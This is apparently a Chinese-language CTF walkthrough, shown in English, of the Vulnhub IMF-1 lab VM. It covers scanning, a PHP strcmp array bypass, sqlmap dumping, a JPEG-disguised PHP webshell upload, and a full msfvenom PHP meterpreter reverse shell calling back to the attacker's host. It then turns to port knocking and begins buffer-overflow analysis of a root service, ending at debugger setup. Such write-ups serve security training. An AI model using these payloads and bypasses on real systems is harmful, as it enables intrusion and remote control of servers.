Vulnhub IMF-1 Walkthrough
Host discovery
Since the target is on the same subnet, arp-scan can be used directly
┌──(root㉿kali)-[/home/kali]
└─# arp-scan 192.168.120.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ab:50:b1, IPv4: 192.168.120.160
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.120.1 00:50:56:c0:00:08 (Unknown)
192.168.120.2 00:50:56:f6:91:bf (Unknown)
192.168.120.172 00:0c:29:3d:3b:81 (Unknown)
192.168.120.254 00:50:56:e0:b3:8e (Unknown)
9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.084 seconds (122.84 hosts/sec). 4 responded
The target host IP is 192.168.120.172
Information gathering
Port scanning
Open port scan
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 192.168.120.172 --min-rate=1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-08 23:47 EDT
Nmap scan report for 192.168.120.172
Host is up (0.0013s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:3D:3B:81 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 110.78 seconds
Service scan
┌──(root㉿kali)-[/home/kali]
└─# nmap -A -p80 192.168.120.172
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-08 23:51 EDT
Nmap scan report for 192.168.120.172
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: IMF - Homepage
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:3D:3B:81 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 3.13 - 4.4 (93%), Linux 3.16 - 4.6 (93%), Linux 3.2 - 4.14 (93%), Linux 3.8 - 3.16 (93%), Linux 4.4 (93%), Linux 3.13 (90%), Linux 3.18 (89%), Linux 4.2 (87%), Linux 3.13 - 3.16 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 1.13 ms 192.168.120.172
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.94 seconds
Port 80 (web service) is open
Directory scanning
Directory scan with gobuster
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.120.172 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.172
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.6
[+] Extensions: aspx,jsp,bak,swp,config,php,txt,env,json,log,git,html,js,asp
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/contact.php (Status: 200) [Size: 8649]
/.html (Status: 403) [Size: 280]
/projects.php (Status: 200) [Size: 6574]
/index.php (Status: 200) [Size: 4797]
/.php (Status: 403) [Size: 280]
/images (Status: 301) [Size: 319] [--> http://192.168.120.172/images/]
/css (Status: 301) [Size: 316] [--> http://192.168.120.172/css/]
/js (Status: 301) [Size: 315] [--> http://192.168.120.172/js/]
/fonts (Status: 301) [Size: 318] [--> http://192.168.120.172/fonts/]
/less (Status: 301) [Size: 317] [--> http://192.168.120.172/less/]
/.html (Status: 403) [Size: 280]
/.php (Status: 403) [Size: 280]
/server-status (Status: 403) [Size: 280]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
- /contact.php

This page gives details on three internal staff members
flag1
flag1 was found in the page source; the other pages turned up nothing useful:

Its content looks like base64; decoding it gives allthefiles:

All the files? Higher up in the source there are a few more files whose names look base64-encoded:

flag2
Following the allthefiles hint, concatenate the file names in order and decode the result to get flag2:

Its content is again base64; decoding it gives a hint:

- /imfadministrator/

Its source mentions that SQL cannot be used, but the password is hard-coded:

Submitting random values produces an "invalid username" message:

Trying the details from the earlier /contact.php page, the local part of an email address as the username only produces a "wrong password" message:

sqlmap also failed:

From the hint in the source, the password is hard-coded. In PHP such comparisons are usually done with == or strcmp, which distinguish case; strcmp, however, has a quirk: when a string is compared with an array the function returns 0. Edit the form source so the submitted value becomes an array:
<input type="password" name="pass" value="">
// 改为:
<input type="password" name="pass[]" value="">
PS: strcmp()
Usage: strcmp(string1, string2). A return value of 0 means the two strings are equal; a value below 0 means string1 is less than string2; a value above 0 means string1 is greater than string2.
Vulnerability: when non-string data is passed in, strcmp reports an error and returns 0, yet the comparison is then treated as equal. So strcmp() returns 0 when comparing a string with an array, and setting the target variable to an array bypasses the check.

flag3
This yields flag3 and a link:

Again base64; decoding it:

SQL injection
Following the link leads to several pages; the URL looks as if it may be vulnerable to SQL injection and directory traversal, but traversal turned out not to work:

Trying SQL injection: capture the request and feed the saved request file to sqlmap:

sqlmap -o -r req.txt --risk=3 --level=5 --dbs --batch --threads=10
--risk=3: risk level 3, adds OR-based SQL injection tests
--level=5: scan level 5, also tests HTTP Cookie values and the User-Agent and Referer headers
--dbs: enumerate all databases
--batch: run with default answers, no user input needed
--threads=10: use 10 threads
List all databases:

Pull more data: inspect the admin database
List all tables
sqlmap -o -r req.txt --risk=3 --level=5 --batch --threads=10 -D admin --tables

List all columns
sqlmap -o -r req.txt --risk=3 --level=5 --batch --threads=10 -D admin -T pages --columns

Dump all field contents
sqlmap -o -r req.txt --risk=3 --level=5 --batch --threads=10 -D admin -T pages -C id,pagedata,pagename --dump

flag4
Of the three pagenames retrieved, one had not been seen before; try visiting it:

It contains a QR code; scanning it gives flag4:

File upload: obtaining a foothold & flag5
/uploadr942.php
The content is once again base64; decoding it gives another file name that looks like a path:

Visiting that path shows a file upload page; the front end does no filtering, so any filtering is probably on the back end:

Trying uploads: txt, php and similar extensions are rejected:
jpg and other image files can be uploaded, but there is a size limit and a file-header check:
and a WAF inspects the content and rejects dangerous functions:
Build a file whose payload avoids dangerous functions:
# create a jpeg file whose header is FFD8FFE0
┌──(root㉿kali)-[/home/kali/Templates]
└─# echo 'FFD8FFE0' | xxd -r -p > shell.gif
┌──(root㉿kali)-[/home/kali/Templates]
└─# file shell.gif
shell.gif: JPEG image data
# append the injection statement at the end
<?php $cmd=$_POST['cmd']; echo `$cmd`; ?>
PS:
- In PHP, backticks (`...`) execute their contents as a system command and return the command's output (similar to the shell_exec() function).
- For example: echo `whoami` runs whoami and prints the current system user.
Upload succeeded:
Scan the /imfadministrator/ directory with gobuster to work out the upload path:
┌──(root㉿kali)-[/home/kali/Templates]
└─# gobuster dir -u http://192.168.120.172/imfadministrator/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x jpg -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.172/imfadministrator/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.6
[+] Extensions: jpg
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 336] [--> http://192.168.120.172/imfadministrator/images/]
/uploads (Status: 301) [Size: 337] [--> http://192.168.120.172/imfadministrator/uploads/]
An uploads directory was found, but it cannot be browsed directly, and the uploaded file cannot be reached by its original name either. Looking at the page source, a comment contains a string that changes with every upload; guessing that this is the new file name, try accessing it:

Access succeeded, so the file does exist and commands execute; listing the current directory shows a flag5 file:

Its content is again base64; decoded it reads:

This hint cannot be used yet
Privilege escalation
For convenience when running commands, convert the shell into an msf shell:
Create the payload:
┌──(root㉿kali)-[/home/kali/Templates]
└─# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.120.160 LPORT=4444 -f raw > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1116 bytes
┌──(root㉿kali)-[/home/kali/Templates]
└─# cat shell.php
/*<?php /**/ error_reporting(0); $ip = '192.168.120.160'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
# MSF listener configuration
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.120.160
set LPORT 4444
run
base64-encode the content, transfer it to the target and decode it there:

Get the msf shell and spawn a more capable interactive shell:
meterpreter > shell
Process 7474 created.
Channel 1 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@imf:/var/www/html/imfadministrator/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
PS: explanation of the vulnerability
The reason a gif is parsed as php here is an Apache file-parsing vulnerability on the target site: the site's .htaccess file shows that gif files are handed to the PHP handler:
www-data@imf:/var/www/html/imfadministrator/uploads$ cat .ht*
cat .ht*
AddType application/x-httpd-php .php .gif
AddHandler application/x-httpd-php .gif
agent services
Following the flag5 hint, the next target is the agent service; search for agent-related files and content
www-data@imf:/tmp$ find / -iname agent 2>/dev/null
find / -iname agent 2>/dev/null
/usr/local/bin/agent
/etc/xinetd.d/agent
Two agent files were found; check what each one is:
- /usr/local/bin/agent
www-data@imf:/tmp$ ls -al /usr/local/bin/agent
ls -al /usr/local/bin/agent
-rwxr-xr-x 1 root root 11896 Oct 12 2016 /usr/local/bin/agent
www-data@imf:/tmp$ file /usr/local/bin/agent
file /usr/local/bin/agent
/usr/local/bin/agent: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=444d1910b8b99d492e6e79fe2383fd346fc8d4c7, not stripped
This is an ELF executable
- /etc/xinetd.d/agent
www-data@imf:/tmp$ ls -al /etc/xinetd.d/agent
ls -al /etc/xinetd.d/agent
-rw-r--r-- 1 root root 379 Oct 11 2016 /etc/xinetd.d/agent
www-data@imf:/tmp$ file /etc/xinetd.d/agent
file /etc/xinetd.d/agent
/etc/xinetd.d/agent: ASCII text
www-data@imf:/tmp$ cat /etc/xinetd.d/agent
cat /etc/xinetd.d/agent
# default: on
# description: The agent server serves agent sessions
# unencrypted agentid for authentication.
service agent
{
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/local/bin/agent
log_on_failure += USERID
disable = no
port = 7788
}
This is a text file, evidently a configuration file: it starts an agent service as root (invoking the agent binary found above) on port 7788
Check the currently open ports and their services:
www-data@imf:/tmp$ netstat -atnup
netstat -atnup
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:7788 0.0.0.0:* LISTEN -
tcp 0 160 192.168.120.172:55198 192.168.120.160:4444 ESTABLISHED 7348/sh
tcp 0 0 192.168.120.172:55190 192.168.120.160:4444 ESTABLISHED 4620/sh
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 192.168.120.172:80 192.168.120.1:51604 ESTABLISHED -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
Port 7788 is open here, but the earlier nmap scan did not find it, so the firewall must be configured to hide it.
Check whether the directory holding the agent binary contains anything else:
www-data@imf:/tmp$ ls -alh /usr/local/bin/
ls -alh /usr/local/bin/
total 24K
drwxr-xr-x 2 root root 4.0K Oct 16 2016 .
drwxr-xr-x 10 root root 4.0K Sep 22 2016 ..
-rw-r--r-- 1 root root 19 Oct 16 2016 access_codes
-rwxr-xr-x 1 root root 12K Oct 12 2016 agent
www-data@imf:/tmp$ cat /usr/local/bin/access_codes
cat /usr/local/bin/access_codes
SYN 7482,8279,9467
There is another file whose contents look related to port knocking (for port knocking see: Project 6)
Port knocking
Knock with nmap:
┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -r 192.168.120.172 -p 7482,8279,9467
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 22:19 EDT
Nmap scan report for 192.168.120.172
Host is up (0.00045s latency).
PORT STATE SERVICE
7482/tcp filtered unknown
8279/tcp filtered unknown
9467/tcp filtered unknown
MAC Address: 00:0C:29:3D:3B:81 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 192.168.120.172 --min-rate=1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 22:19 EDT
Nmap scan report for 192.168.120.172
Host is up (0.00025s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
7788/tcp open unknown
MAC Address: 00:0C:29:3D:3B:81 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 101.44 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -sV -p7788 192.168.120.172
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 22:22 EDT
Nmap scan report for 192.168.120.172
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
7788/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port7788-TCP:V=7.95%I=7%D=4/10%Time=67F87D06%P=x86_64-pc-linux-gnu%r(NU
SF:LL,6F,"\x20\x20___\x20__\x20\x20__\x20___\x20\n\x20\|_\x20_\|\x20\x20\\
...
SF:|\x20\|\|\x20\|\\/\|\x20\|\x20_\|\x20\x20\x20Reporting\n\x20\|___\|_\|\
SF:x20\x20\|_\|_\|\x20\x20\x20\x20System\n\n\nAgent\x20ID\x20:\x20Invalid\
SF:x20Agent\x20ID\x20\n");
MAC Address: 00:0C:29:3D:3B:81 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.90 seconds
Port 7788 and the agent service are now reachable
Try connecting to the open agent service:

Buffer overflow
Buffer overflow principle:
Writing more data into a program's buffer than it can hold makes the buffer overflow, corrupting the program's stack and causing it to crash or to execute other instructions, which is the attacker's aim. The root cause is that the program does not carefully check user-supplied input. A buffer overflow attack needs several pieces of information about the target:
- where the buffer's limit lies, i.e. the offset
- how much space remains, i.e. how much room is usable after the overflow
- how to execute the injected code
Functions prone to buffer overflows: strcat(), sprintf(), vsprintf(), gets(), scanf()
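As an added illustration (not code from the agent binary or from this page), the pattern behind the crash discussed here: a fixed-size report buffer filled without a length check, beside a bounded reader that rejects an over-long line and drains it so the leftover bytes cannot be read as the next menu selection. REPORT_CAP and the function names are assumptions; the inputs are constructed to mirror the page's test.

```c
#define _POSIX_C_SOURCE 200809L  /* for fmemopen */
#include <stdio.h>
#include <string.h>

#define REPORT_CAP 64  /* assumed buffer size; the real binary's is unknown */

/* Vulnerable pattern (illustration only, never called by the test): bytes are
 * stored up to the newline with no check against sizeof(report), so a
 * 200-byte line overruns the stack and crashes, as seen on the page. */
int submit_report_unsafe(FILE *in) {
    char report[REPORT_CAP];
    size_t n = 0;
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        report[n++] = (char)c;            /* no bound on n */
    report[n] = '\0';
    printf("Report: %s\n", report);
    return (int)n;
}

/* Hardened reader: fgets() never writes past cap-1 bytes; an over-long line is
 * rejected (not silently truncated) and the rest of it is discarded so it
 * cannot be consumed as the next menu selection.
 * Returns the accepted length, -1 on EOF/error, -2 if the line was too long. */
int read_report_bounded(FILE *in, char *dst, size_t cap) {
    if (cap < 2 || !fgets(dst, (int)cap, in)) return -1;
    size_t len = strcspn(dst, "\n");
    if (dst[len] == '\n') { dst[len] = '\0'; return (int)len; }
    int c = fgetc(in);
    if (c == '\n' || c == EOF) return (int)len;   /* exactly cap-1 bytes: complete */
    while ((c = fgetc(in)) != EOF && c != '\n') {} /* drain the excess */
    dst[0] = '\0';
    return -2;
}

/* Run the bounded reader over a constructed input string standing in for stdin. */
int handle_report(const char *input, char *out, size_t cap) {
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (!in) return -1;
    int r = read_report_bounded(in, out, cap);
    fclose(in);
    return r;
}

/* The two inputs used on the page: "q" and a 200-byte run of 'A'. */
int demo_short_report(void) {
    char buf[REPORT_CAP];
    return handle_report("q\n", buf, sizeof buf);   /* 1 */
}
int demo_long_report(void) {
    char line[256], buf[REPORT_CAP];
    memset(line, 'A', 200); line[200] = '\n'; line[201] = '\0';
    return handle_report(line, buf, sizeof buf);    /* -2, no crash */
}
```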
Local analysis
Bring the agent binary to the local machine for analysis:
www-data@imf:/tmp$ base64 /usr/local/bin/agent
base64 /usr/local/bin/agent
f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAAIUECDQAAACgKQAAAAAAADQAIAAJACgAHwAcAAYAAAA0
AAAANIAECDSABAggAQAAIAEAAAUAAAAEAAAAAwAAAFQBAABUgQQIVIEECBMAAAATAAAABAAAAAEA
AAABAAAAAAAAAACABAgAgAQIKA8AACgPAAAFAAAAABAAAAEAAAAIHwAACK8ECAivBAg0AQAARAEA.....
┌──(root㉿kali)-[/home/kali/Templates]
└─# vim base64.txt
┌──(root㉿kali)-[/home/kali/Templates]
└─# cat base64.txt | base64 -d > agent
┌──(root㉿kali)-[/home/kali/Templates]
└─# ls -alh
总计 48K
drwxr-xr-x 2 kali kali 4.0K 4月10日 22:57 .
drwx------ 19 kali kali 4.0K 4月10日 22:17 ..
-rw-r--r-- 1 root root 12K 4月10日 22:57 agent
-rw-r--r-- 1 root root 16K 4月10日 22:57 base64.txt
Use the tracing tool ltrace to debug and analyze it:
┌──(root㉿kali)-[/home/kali/Templates]
└─# ltrace ./agent
__libc_start_main(["./agent"] <unfinished ...>
setbuf(0xf7f62d40, nil) = <void>
asprintf("48093572", "%i", 48093572) = 8
puts(" ___ __ __ ___ " ___ __ __ ___
) = 18
puts(" |_ _| \\/ | __| Agent" |_ _| \/ | __| Agent
) = 25
puts(" | || |\\/| | _| Reporting" | || |\/| | _| Reporting
) = 29
puts(" |___|_| |_|_| System\n" |___|_| |_|_| System
) = 27
printf("\nAgent ID : "
Agent ID : ) = 12
fgets(jdoaidoa
"jdoaidoa", 9, 0xf7f625c0) = 0xff946d2e
strncmp("jdoaidoa", "48093572", 8) = 1
puts("Invalid Agent ID "Invalid Agent ID
) = 18
+++ exited (status 254) +++
After fgets() receives arbitrary input (jdoaidoa), strncmp() compares two strings, one of them a built-in hard-coded value; the result is 1, so they are not equal. This function does the same job as the PHP strcmp() seen in the web part, and here it exposes the comparison value, so try logging in with that value (48093572):
┌──(root㉿kali)-[/home/kali/Templates]
└─# ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection:
Login succeeded
Overflow verification
Use strings to look at the strings in the program and the functions it uses:
┌──(root㉿kali)-[/home/kali/Templates]
└─# strings ./agent
...
Ashton Park, Mosman, Sydney, New South Wales, Australia
Argyle Place, The Rocks, Sydney, New South Wales, Australia
Extraction Request
Enter extraction location:
Location: %s
Extraction team has been deployed.
Enter report update:
Report: %s
Submitted for review.
;*2$",
...
The two %s here are likely buffer overflow points; the report one corresponds to option 3 in the menu. Try entering an overlong string to see whether it crashes; if it does, the overflow exists and the next step is to find the offset:
Normal input:
┌──(root㉿kali)-[/home/kali/Templates]
└─# ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3
Enter report update: q
Report: q
Submitted for review.
Overlong input:
# generate a long string
┌──(root㉿kali)-[/home/kali/Templates]
└─# python3
Python 3.13.2 (main, Mar 13 2025, 14:29:07) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> print('A'*200)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# start the test
┌──(root㉿kali)-[/home/kali/Templates]
└─# ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3
Enter report update: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Report: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Submitted for review.
zsh: segmentation fault ./agent
After the overlong input the program crashed with segmentation fault ./agent, which confirms the overflow; the next step is to find the offset
Finding the offset
Install/configure the tools:
cd ~
git clone https://github.com/scwuaptx/Pwngdb.git
git clone https://github.com/longld/peda.git
git clone https://github.com/pwndbg/pwndbg
cd ./pwndbg
./setup.sh
cd ..
cp ./Pwngdb/.gdbinit ~/
vim ~/.gdbinit
# configure as follows:
source ~/peda/peda.py
source ~/pwndbg/gdbinit.py
source ~/Pwngdb/pwngdb.py
source ~/Pwngdb/angelheap/gdbinit.py
define hook-run
python
import angelheap
angelheap.init_angelheap()
end
end
